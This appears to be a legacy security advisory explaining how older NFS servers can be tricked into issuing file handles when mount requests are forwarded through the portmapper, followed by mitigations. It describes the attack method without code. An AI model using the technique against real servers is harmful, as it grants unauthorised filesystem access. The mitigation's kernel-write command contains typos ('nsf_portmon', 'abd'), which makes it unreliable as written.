COMMAND
portmap
SYSTEMS AFFECTED
Older, unpatched versions of NFS. Specifically, systems running
NFS and exporting filesystems to themselves. SunOS 4.1.x, Ultrix,
Solaris, IRIX 4.x
PROBLEM
Normally when trying to get files via NFS several things must be
sent to the server:
NFS file handle (kina like a vol_label, but for files instead of
disks) Action (what you want to do) Your username
If you have never accessed that file before, you send a request
to the mount daemon. It checks it's list of permissions, and
depending on what you are allowed to do, you are returned your
own "File handle". This can be used in the future to get the
file over and over again, and they usually can't be changed
without recompiling or updating the server itself.
Instead of using the mount daemon to process mount requests, you
can use the portmapper with a pmap_call formatted as a mount
request, and the portmapper will forward the request to the mount
daemon. The mount daemon then sees the request as one
originating from the localhost and processes it, returning a
valid filehandle. Now the attacker has a file handle (passed to
it by the portmapper) and he can access those files that the
localhost has perms for whenever he wants.
An attacker could get access to your entire filesystem remotely.
SOLUTION
Run a portmapper that will not forward requests to the mount
daemon (such as Wietse Venema's portmapper in TCP_Wrappers, or
his rpc_bind program.
Enable port checking - excerpted from Aleph1's /etc/rc.local file:
rpc.mountd
echo "nsf_portmon/W1" | abd -w /vmunix /dev/kmem
Block ports 111 (portmapper) and 2049 (NFS) from the outside via a
filtering router or poxy server
On a Sun: just add '-p' to the startup of mountd in /etc/rc*
Do not self-reference an NFS server in it's own exports file (no
"localhost" entry)